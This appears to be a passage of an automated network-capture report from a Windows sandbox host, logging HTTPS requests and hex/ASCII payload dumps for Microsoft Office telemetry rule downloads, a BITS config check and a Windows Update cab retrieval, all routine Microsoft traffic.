ac e9 f2 c4 6f 1a 39 a2 6f 2d 60 d4 24 0a 64 73 c7 ca cb c9 03 a7 3c 56 12 a7 16 d3 67 4d 3a 93 49 a4 63 fc 42 d1 22 d2 ec 7e d6 ec bb a5 61 e5 ca bf f2 d0 b0 ce 3e a3 bd 72 7f 69 89 ad 64 82 e1 Data Ascii: {7v>QZtI$QH;z{gt.dOne\|*y$b:kBKd'YX.?i^2]GW7[RH\lt]kayF1O+nN-;iRIq=0?hz>o9o-`$ds<VgM:IcB"~a>rid

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	49741	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:25 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:25 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 27a1a40f-f01e-0096-7d0b-4810ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095125Z-r1cf579d7786c2tshC1EWRr1gc00000001pg000000001pgk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:25 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.6	49743	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:25 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:25 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 3de6f1c3-b01e-003d-6e01-48d32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095125Z-r1cf579d77867vg8hC1EWR8knc00000001t0000000003a8f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:25 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.6	49742	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:25 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:25 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 9879796e-101e-0034-5802-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095125Z-r1cf579d77898tqwhC1EWRf9q80000000230000000001krd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:25 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.6	49744	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:25 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:25 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: 1e9ba10d-901e-0029-2907-48274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095125Z-r1cf579d778w59f9hC1EWRze6w000000024g0000000041g7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:25 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.6	49745	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:25 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:25 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095125Z-r1cf579d778t5c2lhC1EWRce3w00000002s0000000000ya4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:25 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	49753	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-12-07 09:51:27 UTC	478	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=83244 Date: Sat, 07 Dec 2024 09:51:27 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.6	49754	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:27 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: b569e8fb-501e-008c-5305-48cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095127Z-r1cf579d778xr2r4hC1EWRqvfs00000001zg0000000033qm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:27 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.6	49755	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:27 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 3fcfbabf-e01e-0052-0903-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095127Z-r1cf579d778kr8xrhC1EWRfkun00000002d000000000331q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:27 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.6	49756	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:27 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 682fb484-401e-0083-5904-48075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095127Z-r1cf579d778dfdgnhC1EWRd3w000000001xg000000000cfh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:27 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.6	49757	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:27 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 22943564-b01e-0021-0b03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095127Z-r1cf579d778lntp7hC1EWR9gg400000001h0000000000u04 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:27 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.6	49758	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:27 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: aae5b6c6-f01e-005d-7a06-4813ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095127Z-r1cf579d778xq4f9hC1EWRx41g00000001ug0000000023ab x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:27 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49759	4.245.163.56	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:27 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=7xDWM6ApMeetRAR&MD=299fFNu4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-12-07 09:51:28 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 2a85d051-a652-4e58-bc19-a82a32beb13f MS-RequestId: 16767a8b-24cc-4e35-b6fd-8805e139c1af MS-CV: mUZgjbZrwU2xs1hr.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Sat, 07 Dec 2024 09:51:26 GMT Connection: close Content-Length: 24490
2024-12-07 09:51:28 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
